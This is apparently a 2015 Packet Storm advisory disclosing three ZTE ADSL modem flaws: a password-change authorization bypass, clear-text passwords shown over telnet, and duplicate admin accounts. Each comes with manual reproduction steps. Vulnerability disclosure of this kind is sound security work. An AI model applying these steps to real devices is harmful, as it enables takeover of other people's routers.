Lucene search
Karn GaneshenPACKETSTORM:134336HistoryNov 14, 2015 - 12:00 a.m.
ZTE ADSL Authorization Bypass / Information Disclosure
2015-11-1400:00:00
Karn Ganeshen
packetstormsecurity.com
19
EPSS
0.003
Percentile
68.8%
`*ZTE ADSL modems - Multiple vulnerabilities*
Confirmed on 2 (of multiple) software versions - *W300V2.1.0f_ER7_PE_O57
and W300V2.1.0h_ER7_PE_O57*
1 *Insufficient authorization controls*
*CVE-ID*: CVE-2015-7257
Observed in Password Change functionality. Other functions may be
vulnerable as well.
*Expected behavior:*
Only administrative 'admin' user should be able to change password for all
the device users. 'support' is a diagnostic user with restricted
privileges. It can change only its own password.
*Vulnerability:*
Any non-admin user can change 'admin' password.
*Steps to reproduce:*
a. Login as user 'support' password XXX
b. Access Password Change page - http://<IP>/password.htm
c. Submit request
d. Intercept and Tamper the parameter username change from 'support' to
'admin'
e. Enter the new password > old password is not requested > Submit
> Login as admin
-> Pwn!
2 *Sensitive information disclosure - clear-text passwords*
Displaying user information over Telnet connection, shows all valid users
and their passwords in clear-text.
*CVE-ID*: CVE-2015-7258
*Steps to reproduce:*
$ telnet <IP>
Trying <IP>...
Connected to <IP>.
Escape character is '^]'.
User Access Verification
Username: admin
Password: < admin/XXX1
$sh
ADSL#login show <-- shows user information
Username Password Priority
admin password1 2
support password2 0
admin password3 1
3 *(Potential) Backdoor account feature - **insecure account management*
Same login account can exist on the device, multiple times, each with
different priority#. It is possible to log in to device with either of the
username/password combination.
*CVE-ID*: CVE-2015-7259
It is considered as a (redundant) login support *feature*.
*Steps to reproduce:*
$ telnet <IP>
Trying <IP>...
Connected to <IP>.
Escape character is '^]'.
User Access Verification
User Access Verification
Username: admin
Password: <-- admin/password3
$sh
ADSL#login show
Username Password Priority
admin password1 2
support password2 0
admin password3 1
+++++
Best Regards,
Karn Ganeshen
--
Best Regards,
Karn Ganeshen
`
Related
zdt
zdt
ZTE ADSL ZXV10 W300 Modems - Multiple Vulnerabilities
2015-11-20 00:00:00
packetstorm
packetstorm
ZTE ADSL ZXV10 W300 Authorization / Disclosure / Backdoor
2015-11-20 00:00:00
exploitpack
exploitpack
ZTE ADSL ZXV10 W300 Modems - Multiple Vulnerabilities
2015-11-20 00:00:00
exploitdb
exploitdb
ZTE ADSL ZXV10 W300 Modems - Multiple Vulnerabilities
2015-11-20 00:00:00
cvelist
cvelist
prion
prion
Code injection
2017-08-24 20:29:00
Default credentials
2017-08-24 20:29:00
Default credentials
2017-08-24 20:29:00
cve
cve
nvd
nvd